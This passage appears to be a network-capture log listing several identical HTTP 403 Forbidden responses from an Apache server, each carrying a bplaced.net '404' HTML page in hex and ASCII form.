                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:34.058094978 CEST14408INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:34 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=111
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:35.054543972 CEST14416INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:35 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=113
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:36.143098116 CEST14423INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:36 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=123
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:37.071418047 CEST14431INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:37 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=119
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:38.046431065 CEST14439INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:38 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=107
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
